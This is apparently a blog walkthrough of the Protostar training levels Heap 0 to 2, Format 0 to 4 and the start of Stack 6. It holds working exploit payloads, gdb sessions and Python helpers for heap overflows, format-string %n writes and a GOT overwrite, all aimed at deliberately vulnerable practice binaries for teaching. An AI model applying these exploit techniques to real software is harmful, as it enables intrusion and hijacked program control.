Exploit Exercises — Protostar Heap 2

There are a few interesting things here. The first one is in this code:

if(strlen(line + 5) < 31) {
    strcpy(auth->name, line + 5);
}

The length of the input line is checked before the copy, so we cannot simply overflow auth->name.

The second one is in this code:

auth = malloc(sizeof(auth));

When malloc() reserves space, it uses sizeof(auth). However, auth is a pointer, so malloc() receives the size of an address rather than the size of the structure itself. It should be sizeof(struct auth).

You can verify that the address increases by 0x10 each time we allocate new memory with the auth command:

auth a
[ auth = 0x804c008, service = (nil) ]
auth a
[ auth = 0x804c018, service = (nil) ]

0x10 is the space needed for the 8-byte chunk header, the 4 bytes of data, and 4 bytes of padding for alignment.

To understand how an allocated chunk looks, just use this picture:

We see the program uses strdup(), which allocates a copy of a string on the heap. In other words, it calls malloc() internally. So we can use this function to allocate additional heap memory.

We need to construct a pseudo heap chunk, as if 32 bytes had been allocated for auth. Don’t forget to take into account the size of the chunk header used by the strdup() allocation. Then we need to write a value right after those 32 bytes.

Here is a short explanation of what is going to happen. We need our memory to look like this after execution:

auth chunk header [8]
-------------------------- chunk header --------------------------
auth chunk data [4]
padding to be aligned  [4] /* remember that 0x10  */
---- end of auth ----
service chunk header [8]
service chunk data [16]    /* 16 is a calculated value */
------------------------ 32 bytes of data ------------------------
auth [4]

Construct and run the exploit:

$ python -c "print 'auth a'+'\n'+'service'+'A'*16+'\xff'+'\n'+'login'" | ./heap2
[ auth = (nil), service = (nil) ]
[ auth = 0x804c008, service = (nil) ]
[ auth = 0x804c008, service = 0x804c018 ]
you have logged in already!
[ auth = 0x804c008, service = 0x804c018 ]
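The 16 bytes of padding can be derived from the two pointers the program prints. The following is a minimal Python 3 sketch of that arithmetic. It assumes the structure is laid out as a 32-byte name followed by an int flag (consistent with the "32 bytes of data" in the diagram above); the names AUTH_FLAG_OFFSET and service_padding are illustrative only.

```python
# Addresses printed by the program in the run above.
AUTH_PTR = 0x804c008      # value of the auth pointer
SERVICE_PTR = 0x804c018   # value of the service pointer

# Assumption: struct auth is { char name[32]; int auth; }, so the flag
# lives 32 bytes past the start of the structure.
AUTH_FLAG_OFFSET = 32


def service_padding(auth_ptr, service_ptr, flag_offset=AUTH_FLAG_OFFSET):
    """Bytes strdup() must copy before it reaches the auth flag."""
    return (auth_ptr + flag_offset) - service_ptr


padding = service_padding(AUTH_PTR, SERVICE_PTR)
print(padding)

# Input lines for the program; the byte after the padding lands on the flag.
payload = b"auth a\n" + b"service" + b"A" * padding + b"\xff\n" + b"login\n"
```

If the heap layout differs (another allocator or alignment), only the two pointer values need to change.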

Exploit Exercises — Protostar Heap 1

This level is different. Finding a vulnerability in the code is easy:

strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);

There are no buffer length checks. We can crash our program like this:

$ ./heap1 `python -c "print 'A'*30"` aaa
Segmentation fault

But when you use smaller input, it runs without any errors:

$ ./heap1 `python -c "print 'A'*20"` aaa
and that's a wrap folks!

Why is this happening? I started gdb and overflowed the input by 1 byte:

(gdb) r `python -c "print 'A'*21"` aaa
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*21"` aaa

Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x8040041 <Address 0x8040041 out of bounds>, src=0xbffff899 "aaa")
    at strcpy.c:40
40    strcpy.c: No such file or directory.
    in strcpy.c

I noticed the 0x41 byte in the destination address passed to strcpy(). That looked strange, so I ran the program again, but this time I overflowed it by 2 bytes:

(gdb) r `python -c "print 'A'*22"` aaa
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*22"` aaa

Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x8004141 <Address 0x8004141 out of bounds>, src=0xbffff899 "aaa")
    at strcpy.c:40
40    strcpy.c: No such file or directory.
    in strcpy.c

Clearly, we are overwriting the destination address passed to strcpy(). Since the second argument passed to the function is aaa, we are in the second strcpy() call.

At this moment I realized how to exploit this app. Since we control the destination address that the second strcpy() writes to, we can point it at the return address saved on the stack. The second strcpy() then copies the second input parameter there, so we can change the program flow.

Let’s examine the stack after the crash:

(gdb) r `python -c "print 'A'*30"` aaa
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*30"` aaa

Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x41414141 <Address 0x41414141 out of bounds>, src=0xbffff899 "aaa")
    at strcpy.c:40
40    strcpy.c: No such file or directory.
    in strcpy.c
(gdb) x/2x $esp
0xbffff640:    0x00000000    0x00000000
(gdb) x/20x $esp
0xbffff640:    0x00000000    0x00000000    0xbffff678    0x0804855a
0xbffff650:    0x41414141    0xbffff899    0x08048580    0xbffff678
0xbffff660:    0xb7ec6365    0x0804a008    0x0804a028    0xb7fd7ff4
0xbffff670:    0x08048580    0x00000000    0xbffff6f8    0xb7eadc76
0xbffff680:    0x00000003    0xbffff724    0xbffff734    0xb7fe1848

0x41414141 is the destination buffer address for strcpy(). After it comes 0xbffff899, the address of the aaa string (we can see it in the error message). Before 0x41414141 there are two more values, probably the saved ebp and the saved eip (the return address). Let’s look at the registers:

(gdb) info registers
...
esp            0xbffff640    0xbffff640
ebp            0xbffff648    0xbffff648
...
eip            0xb7f09df4    0xb7f09df4 <*__GI_strcpy+20>
...

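Our assumption is correct: ebp is 0xbffff648, the slot that holds the saved ebp, so the return address is stored right after it, at 0xbffff64c.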

So we need to overwrite the i2->name pointer with the address of the saved return address on the stack. The pointer is overwritten after 20 bytes of input, and the return address sits three words above esp, at 0xbffff640 + 3*4 = 0xbffff64c. Let’s try to overwrite i2->name: run gdb and set a breakpoint on the second strcpy() call:

(gdb) b* 0x08048555
Breakpoint 1 at 0x8048555: file heap1/heap1.c, line 32.
(gdb) r `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` CCCC

Breakpoint 1, 0x08048555 in main (argc=3, argv=0xbffff724) at heap1/heap1.c:32
32    in heap1/heap1.c
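The address arithmetic and the little-endian byte order used in the first argument can be sketched in Python 3 as follows. This is only an illustration of the calculation; the constant names are made up here, and the values come from the gdb session above.

```python
import struct

ESP_AT_CRASH = 0xbffff640   # esp inside strcpy() in the gdb session above
RET_SLOT_OFFSET = 3 * 4     # the saved return address is three words above esp
NAME_PTR_OFFSET = 20        # filler bytes before the i2->name pointer

# Address of the stack slot that holds the return address.
ret_slot = ESP_AT_CRASH + RET_SLOT_OFFSET

# First argument: filler, then the new value for the i2->name pointer,
# packed as a 32-bit little-endian integer.
first_arg = b"A" * NAME_PTR_OFFSET + struct.pack("<I", ret_slot)

print(hex(ret_slot))
print(first_arg[-4:])
```

struct.pack("<I", ...) produces the same four bytes as the hand-written '\x4c\xf6\xff\xbf' in the command above.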

If we look at our stack, we can see that the return address was successfully overwritten with 0x43434343 (see the value at memory address 0xbffff64c):

(gdb) s
...
(gdb) s
...
(gdb) x/24x $esp-12
0xbffff634:    0xb7ff6210    0xbffff87b    0xb7f09de0    0x00000000
0xbffff644:    0x00000000    0xbffff678    0x43434343    0xbffff64c
0xbffff654:    0xbffff894    0x08048580    0xbffff678    0xb7ec6365
0xbffff664:    0x0804a008    0x0804a028    0xb7fd7ff4    0x08048580
0xbffff674:    0x00000000    0xbffff6f8    0xb7eadc76    0x00000003
0xbffff684:    0xbffff724    0xbffff734    0xb7fe1848    0xbffff6e0

Now we need to replace the second parameter with the address of the winner() function. We can get the address of the function using readelf:

$ readelf -Ws heap1 | grep winner
    55: 08048494    37 FUNC    GLOBAL DEFAULT   14 winner

Or from gdb:

(gdb) print winner
$1 = {void (void)} 0x8048494 <winner>

Now we can run our exploit:

(gdb) r `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` `python -c "print '\x94\x84\x04\x08'"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` `python -c "print '\x94\x84\x04\x08'"`
and we have a winner @ 1484241540

Program received signal SIGILL, Illegal instruction.
0xbffff602 in ?? ()

If we run it outside gdb, it won’t work, because the environment variables differ and shift the stack. Let’s find the correct address:

(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) r `python -c "print 'A'*30"` aaa
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*30"` aaa

Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x41414141 <Address 0x41414141 out of bounds>, src=0xbffffdb0 "aaa") at strcpy.c:40
40    strcpy.c: No such file or directory.
    in strcpy.c
(gdb) x/8x $esp
0xbffffb60:    0x00000000    0x00000000    0xbffffb98    0x0804855a
0xbffffb70:    0x41414141    0xbffffdb0    0x08048580    0xbffffb98

Calculate the address as before, 0xbffffb60 + 12 = 0xbffffb6c, and run the exploit in the console:

$ /opt/protostar/bin/heap1 `python -c "print 'A'*20 + '\x6c\xfb\xff\xbf'"` `python -c "print '\x94\x84\x04\x08'"`
and we have a winner @ 1484242022
Segmentation fault

Exploit Exercises — Protostar Heap 0

This level is a lot like classical stack overflows.

Let’s crash the app first:

(gdb) r `python -c "print 'A'*1000"`
Starting program: /opt/protostar/bin/heap0 `python -c "print 'A'*1000"`
data is at 0x804a008, fp is at 0x804a050

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Now let’s find the offset using the pattern tools that ship with Metasploit. Generate a pattern using this command:

$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

Then run the program with the pattern as input:

(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

Starting program: /opt/protostar/bin/heap0 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
data is at 0x804a008, fp is at 0x804a050

Program received signal SIGSEGV, Segmentation fault.
0x41346341 in ?? ()

Then search for 0x41346341 in the pattern:

$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41346341
[*] Exact match at offset 72
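If Metasploit is not at hand, the same lookup can be reproduced with a few lines of Python 3. This is a sketch of the idea rather than the Metasploit implementation: it assumes the pattern is built from upper-case letter, lower-case letter, digit triples (as in the output above), and the function names simply mirror the script names.

```python
import string
import struct


def pattern_create(length):
    """Build a cyclic Aa0Aa1Aa2... pattern of the requested length."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, length=200):
    """Offset of a 32-bit value (as seen in eip) inside the pattern."""
    # The crash address is the pattern bytes read as a little-endian integer.
    needle = struct.pack("<I", value).decode("ascii")
    return pattern_create(length).find(needle)


print(pattern_offset(0x41346341))
```

The function returns -1 when the value does not occur in the pattern, for example when the pattern was too short to reach the overwritten pointer.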

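The output above means that we need to write 72 bytes before reaching the value that ends up in eip, which here is the function pointer fp. This matches the addresses the program prints: 0x804a050 - 0x804a008 = 0x48 = 72.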

Now we need to find the address of winner():

$ readelf -s heap0
...
    55: 08048464    20 FUNC    GLOBAL DEFAULT   14 winner

Now let’s use this address in the exploit:

$ ./heap0 `python -c "print 'A'*72 + '\x64\x84\x04\x08'"`
data is at 0x804a008, fp is at 0x804a050
level passed
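Because the program prints both addresses, the offset can also be computed directly. A small Python 3 sketch of that calculation and of the resulting argument follows; the constant names are illustrative, and the values are taken from the output above.

```python
import struct

DATA_ADDR = 0x804a008      # "data is at" from the program output
FP_ADDR = 0x804a050        # "fp is at" from the program output
WINNER_ADDR = 0x08048464   # winner() as reported by readelf

# Distance from the start of the data buffer to the function pointer.
offset = FP_ADDR - DATA_ADDR

# Filler up to fp, then the new function pointer in little-endian order.
payload = b"A" * offset + struct.pack("<I", WINNER_ADDR)

print(offset)
```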

Exploit Exercises — Protostar Format Levels

This is a protostar walkthrough describing format string exploitation.

This article is the only thing you need to complete these levels.

Format 0

$ ./format0 %64d`python -c 'print "\xef\xbe\xad\xde"'`
you have hit the target correctly :)

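When we use %64d, sprintf() takes one integer argument from the stack and prints it padded to 64 characters, which fills the buffer. The 4 bytes of 0xdeadbeef that follow are then copied past the end of the buffer, causing the overflow.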
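The effect of the field width can be checked with Python 3, whose % operator pads integers the same way for this conversion. This is a sketch only: it assumes the destination buffer is 64 bytes long, and the integer 1 stands in for whatever value sprintf happens to read from the stack.

```python
import struct

BUFFER_SIZE = 64  # assumption: the destination buffer holds 64 bytes

# "%64d" expands one integer to a 64-character field (right-aligned,
# padded with spaces); the 4 address-like bytes follow unchanged.
expanded = b"%64d" % 1 + struct.pack("<I", 0xdeadbeef)

# Everything past the buffer size spills into the adjacent variable.
overflow = expanded[BUFFER_SIZE:]

print(len(expanded))
print(hex(struct.unpack("<I", overflow)[0]))
```

Six bytes of input therefore expand to 68 bytes of output, which is why the short argument is enough to reach the target.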

Format 1

Read this first to understand how different variables are stored. Then we look for target:

$ objdump -t format1 | grep target
08049638 g     O .bss   00000004              target

We see the needed variable is in uninitialized data segment called .bss and has the address 0x08049638.

Then I printed 146 values from the stack to find where our buffer is stored:

$ ./format1 ABCD`python -c 'print "%x."*146'`

ABCD804960c.bffff508.8048469.b7fd8304.b7fd7ff4.bffff508.8048435.bffff708.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff588.b7eadc76.2.bffff5b4.bffff5c0.b7fe1848.bffff570.ffffffff.b7ffeff4.804824d.1.bffff570.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff588.a003ccb4.8a519aa4.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff5b4.8048450.8048440.b7ff1040.bffff5ac.b7fff8f8.2.bffff6fe.bffff708.0.bffff8c3.bffff8d8.bffff8ef.bffff907.bffff915.bffff929.bffff94c.bffff963.bffff976.bffff980.bffffe70.bffffe89.bffffec7.bffffedb.bffffef9.bfffff10.bfffff21.bfffff3c.bfffff44.bfffff54.bfffff61.bfffff97.bfffffac.bfffffc0.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.78bfbbf.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff6db.1f.bffffff2.f.bffff6eb.0.0.0.0.0.50000000.f6e2fdf8.67e5aff4.14e8ba4e.6901a7c9.363836.0.0.0.2f2e0000.6d726f66.317461.44434241.252e7825.78252e78.2e78252e.252e7825.

Can you see the 0x44434241 value near the end? You can also brute-force the offset:

$ for i in {1..1000}; do echo -n "$i ";./format1 "ABCD%$i\$x" | grep 44434241; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
141
142 ABCD44434241

The %N$x form is what is called “direct access”: it reads the N-th argument directly.

You can see ABCD above (don’t forget we are on a little-endian machine). Now we know the offset and can access this value directly:

$ ./format1 ABCD`python -c 'print "%142$x"'`
ABCD44434241u

Now we know the offset of our buffer among the printf arguments, and we can overwrite the value using %n. Read more about using %n here. In a nutshell, %n takes the address of an int variable and stores there the number of bytes written so far.

So if you use something like <addr>%142$n, printf takes addr as the 142nd argument and writes the number of bytes written so far to that address.

We know the address is 0x08049638, which in little-endian format is \x38\x96\x04\x08. Now we can simply replace ABCD with the address:

$ ./format1 `python -c 'print "\x38\x96\x04\x08"+"%142$n"'`
8�you have modified the target :)

Format 2

This time we are supposed to overwrite the variable with a particular value, 64.

Now let’s do a bit of bruteforcing to find the offset:

$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format2 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141target is 0 :(

Now we need to find the address of target variable:

$ objdump -t format2 | grep target
080496e4 g     O .bss   00000004              target

Let’s try to overwrite the variable with an arbitrary value first:

$ python -c "print '\xe4\x96\x04\x08'+'%4\$n'" | ./format2
��
target is 4 :(

We wrote 4 bytes, and the program reports exactly that. If we want to write a larger value, we just need to increase the number of bytes printed. In this case the program prints 64 bytes before %4$n, and %4$n then stores the number of bytes already written:

$ python -c "print '\xe4\x96\x04\x08'+'A'*60+'%4\$n'" | ./format2
��AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have modified the target :)
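The amount of filler follows directly from the value we want %n to store. A minimal Python 3 sketch of that calculation is shown below; build_payload is a hypothetical helper, and the address and argument index are the ones found above.

```python
import struct

TARGET_ADDR = 0x080496e4   # address of target from objdump
WANTED_VALUE = 64          # value the level expects
ARG_INDEX = 4              # argument position found by brute force


def build_payload(addr, wanted, index):
    """Address, filler up to `wanted` bytes, then a positional %n."""
    prefix = struct.pack("<I", addr)
    filler = wanted - len(prefix)
    if filler < 0:
        raise ValueError("wanted value is smaller than the bytes already printed")
    return prefix + b"A" * filler + f"%{index}$n".encode()


payload = build_payload(TARGET_ADDR, WANTED_VALUE, ARG_INDEX)
print(payload)
```

The 4 address bytes count towards the total, which is why only 60 filler bytes are needed.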

Format 3

We start this challenge with bruteforcing to find the offset:

$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format3 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
11
12 AAAAAA41414141target is 00000000 :(

Now we need to find the memory address of target:

$ objdump -t format3 | grep target
080496f4 g     O .bss   00000004              target

So let’s try to rewrite target:

$ python -c "print '\xf4\x96\x04\x08'+'%12\$n'" | ./format3
��
target is 00000004 :(

Awesome! The target now holds 4, the number of bytes written so far.

Then I tried to extend the string and look at the stack:

$ python -c "print 'AAAABBBBCCCCDDDDEEEEFFFFGGGG'+'%x.'*16" | ./format3
AAAABBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.41414141.42424242.43434343.44444444.45454545.
target is 00000000 :(

Now let’s write through the 12th argument directly and then look at the values on the stack:

$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDDEEEEFFFFGGGG'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.45454545.46464646.47474747.24323125.2e78256e.
target is 0000001c :(

To be clearer, let’s draw a simple scheme of our stack:

junk              <- 1st, 2nd, ... values
...
\xf4\x96\x04\x08  <- 12th value
BBBB              <- 13th value
CCCC              <- 14th value
DDDD              <- 15th value
EEEE
FFFF
GGGG
...
<saved ebp>
<saved ret>

I understand that it could be confusing, because the numbers here have nothing to do with how the stack grows. They are just argument numbers. If it is still unclear, try reading about direct access in this paper.

Now everything is clear: we need to replace BBBB, CCCC, DDDD with address + i to overwrite each byte, and add the right amount of padding before each %n in order to write the right value.

Let’s try to rewrite the lowest byte first. It must be 0x44:

$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDD'+'%52u'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDD                                                   0bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.75323525.24323125.2e78256e.252e7825.78252e78.2e78252e.
target is 00000044 :(

Then I tried to rewrite the second byte:

$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%13\$n'" | ./format3
����CCCCDDDD                                                   0
target is 00004444 :(

Awesome, it works. I didn’t know that printf keeps counting the bytes already written. Because the counter only grows, it is easier to write the small values first. We need to get 0x01025544, but after writing 0x44 and 0x55 we certainly cannot write 0x01 or 0x02. However, we can try to write 0x101, for example. We will write in this order: 0x44, 0x55, 0x101, 0x102 (or maybe 0x202).

0x55 is the second byte, so we need to increase our address by just 1:

$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'" | ./format3
����CCCCDDDD                                                   0       3221222592
target is 00005544 :(

Instead of writing 0x101 and 0x102 separately, we can try to write 0x102 as a single two-byte value:

$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08DDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'+'%173u'+'%14\$n'" | ./format3
������DDDD                                                   0       3221222592                                                                                                                                                                   3086843892
you have modified the target :)
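The padding values 52, 17 and 173 are just the differences between successive counter values. The Python 3 sketch below recomputes them and also models what the three overlapping 4-byte stores leave in memory. The helper names are hypothetical, and the DDDD filler is kept only so that the prefix stays 16 bytes long, as in the commands above.

```python
import struct

TARGET_ADDR = 0x080496f4        # address of target from objdump
FIRST_ARG = 12                  # argument index of the first address
COUNTS = [0x44, 0x55, 0x102]    # counter value at each %n, in increasing order


def build_payload(base, first_arg, counts, filler=b"DDDD"):
    """Addresses base, base+1, ... then one %<pad>u%<n>$n pair per write."""
    prefix = b"".join(struct.pack("<I", base + i) for i in range(len(counts)))
    prefix += filler
    written = len(prefix)
    fmt = b""
    for i, count in enumerate(counts):
        pad = count - written
        if pad < 1:
            raise ValueError("counter values must keep increasing")
        fmt += f"%{pad}u%{first_arg + i}$n".encode()
        written = count
    return prefix + fmt


def simulate_writes(counts):
    """Model each %n as a 4-byte little-endian store at base + i."""
    memory = bytearray(len(counts) + 3)
    for i, count in enumerate(counts):
        memory[i:i + 4] = struct.pack("<I", count)
    return struct.unpack("<I", bytes(memory[:4]))[0]


payload = build_payload(TARGET_ADDR, FIRST_ARG, COUNTS)
print(payload)
print(hex(simulate_writes(COUNTS)))
```

Note that the last store also spills two zero bytes past the target, which is harmless in this level.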

Wow, we modified the target :)

Format 4

Now we need to redirect the flow. In order to do so we can just rewrite the return address.

As always we start with finding the offset:

$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format4 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141

Now let’s find the address of hello() function:

$ objdump -t format4 | grep hello
080484b4 g     F .text  0000001e              hello

At this point I understood that we are not supposed to rewrite the return address; instead, we need to change an entry in the relocation table.

Let’s look at relocations:

$ objdump -TR format4

format4:     file format elf32-i386

DYNAMIC SYMBOL TABLE:
00000000  w   D  *UND*  00000000              __gmon_start__
00000000      DF *UND*  00000000  GLIBC_2.0   fgets
00000000      DF *UND*  00000000  GLIBC_2.0   __libc_start_main
00000000      DF *UND*  00000000  GLIBC_2.0   _exit
00000000      DF *UND*  00000000  GLIBC_2.0   printf
00000000      DF *UND*  00000000  GLIBC_2.0   puts
00000000      DF *UND*  00000000  GLIBC_2.0   exit
080485ec g    DO .rodata    00000004  Base        _IO_stdin_used
08049730 g    DO .bss   00000004  GLIBC_2.0   stdin


DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
080496fc R_386_GLOB_DAT    __gmon_start__
08049730 R_386_COPY        stdin
0804970c R_386_JUMP_SLOT   __gmon_start__
08049710 R_386_JUMP_SLOT   fgets
08049714 R_386_JUMP_SLOT   __libc_start_main
08049718 R_386_JUMP_SLOT   _exit
0804971c R_386_JUMP_SLOT   printf
08049720 R_386_JUMP_SLOT   puts
08049724 R_386_JUMP_SLOT   exit

You can also look at the relocation table with:

$ readelf -r format4

Relocation section '.rel.dyn' at offset 0x304 contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
080496fc  00000106 R_386_GLOB_DAT    00000000   __gmon_start__
08049730  00000905 R_386_COPY        08049730   stdin

Relocation section '.rel.plt' at offset 0x314 contains 7 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804970c  00000107 R_386_JUMP_SLOT   00000000   __gmon_start__
08049710  00000207 R_386_JUMP_SLOT   00000000   fgets
08049714  00000307 R_386_JUMP_SLOT   00000000   __libc_start_main
08049718  00000407 R_386_JUMP_SLOT   00000000   _exit
0804971c  00000507 R_386_JUMP_SLOT   00000000   printf
08049720  00000607 R_386_JUMP_SLOT   00000000   puts
08049724  00000707 R_386_JUMP_SLOT   00000000   exit

Good articles about shared libraries and relocations:

I thought it would be a good idea to overwrite the entry for exit() with the address of hello(). Thus we need to replace the value at address 0x08049724 with 0x080484b4.

Now let’s use a test exploit:

$ python -c "print '\x24\x97\x04\x08' + '%33968x' + '%4\$n'" > /tmp/exploit.txt

$ gdb format4
GNU gdb (GDB) 7.0.1-debian
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/format4 < /tmp/exploit.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x000084b4 in ?? ()

Awesome. We rewrote the lower two bytes and jumped to 0x000084b4. Let’s do the same with the other two bytes. Do not forget to correct the padding (subtract 4 from the first one, because we added another 4-byte address).

Now run the exploit:

$ python -c "print '\x24\x97\x04\x08\x26\x97\x04\x08' + '%33964x' + '%4\$n' + '%33616x' + '%5\$n'" | ./format4
...
code execution redirected! you win
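The two padding values come from splitting the address of hello() into 16-bit halves. Since the %n counter can only grow, the second half is reached by letting the counter wrap past 0x10000. The following Python 3 sketch recomputes the numbers; the variable names are illustrative only.

```python
import struct

EXIT_SLOT = 0x08049724    # relocation entry of exit() from objdump -TR
HELLO_ADDR = 0x080484b4   # address of hello() from objdump -t
FIRST_ARG = 4             # argument index found by brute force

low = HELLO_ADDR & 0xffff   # 0x84b4, stored at EXIT_SLOT
high = HELLO_ADDR >> 16     # 0x0804, stored at EXIT_SLOT + 2

# Two addresses, one per 16-bit half.
prefix = struct.pack("<I", EXIT_SLOT) + struct.pack("<I", EXIT_SLOT + 2)

# First padding: reach `low`, minus the 8 bytes already printed.
pad_low = low - len(prefix)

# Second padding: the counter only grows, so go on to 0x10000 + high;
# only the lower two bytes of that value land at EXIT_SLOT + 2.
pad_high = (high - low) % 0x10000

payload = prefix + f"%{pad_low}x%{FIRST_ARG}$n%{pad_high}x%{FIRST_ARG + 1}$n".encode()
print(pad_low, pad_high)
```

The second store writes 0x00010804, so the extra 0x0001 spills into the two bytes after the entry.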

Exploit Exercises — Protostar Stack 6

We can see the binary uses the __builtin_return_address() function. This function returns the return address of the current function. Read more about it here.

The program looks almost like stack5 with a small difference:

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

If the top byte of the return address is 0xff or 0xbf, the program stops. Check the result of the & operation using python:

$ python -c "print hex(0xffffffff & 0xbf000000)"
0xbf000000
$ python -c "print hex(0xbfffffff & 0xbf000000)"
0xbf000000
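To see exactly which addresses the check rejects, the mask can be tried against every possible top byte. This is a small Python 3 sketch; is_blocked is a hypothetical helper that mirrors the condition from the C code above.

```python
def is_blocked(ret):
    """Mirror of the check in the program: (ret & 0xbf000000) == 0xbf000000."""
    return (ret & 0xbf000000) == 0xbf000000


# Try every value of the most significant byte.
blocked_top_bytes = [hex(b) for b in range(256) if is_blocked(b << 24)]
print(blocked_top_bytes)

# An address inside the binary itself passes the check.
print(is_blocked(0x080484f9))
```

Only bit 6 of the top byte is left free by the mask, so exactly two top bytes match.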

If we run gdb and look at the registers, we see that 0xbf****** addresses are simply stack addresses:

(gdb) b main
Breakpoint 1 at 0x8048500: file stack6/stack6.c, line 27.
(gdb) run
Starting program: /opt/protostar/bin/stack6
...
(gdb) info registers
...
esp            0xbffff690    0xbffff690
ebp            0xbffff698    0xbffff698
...

That means that if the return address points to the stack, the program exits. That’s why we were told to use ret2libc or ROP. I have an article on this topic and will talk about it some time later. Actually, they didn’t mention one more way: the jmp esp technique. In this case, the return address (the address of a jmp esp gadget) is not on the stack; it can be found anywhere, even in a shared library. It is really a semi-ROP technique and it’s pretty easy to do, so this is how I did this task.

To be a bit clearer I need to explain how it works.

Every function has a prologue and an epilogue. A prologue looks like this:

push  ebp
mov   ebp, esp

It saves the old ebp and moves ebp “closer” to esp (makes them equal, actually), so that the new function gets its own stack base address.

An epilogue looks like this:

mov    esp, ebp
pop    ebp
ret

It discards the local variables (via mov esp, ebp) and restores ebp. When the program reaches the ret instruction, esp has already been restored and points to the return address on the stack. After ret is executed, esp is increased by 4 bytes (the size of an address on a 32-bit system). So if our exploit looks like JUNK + RET + SHELLCODE, esp will point to the shellcode.

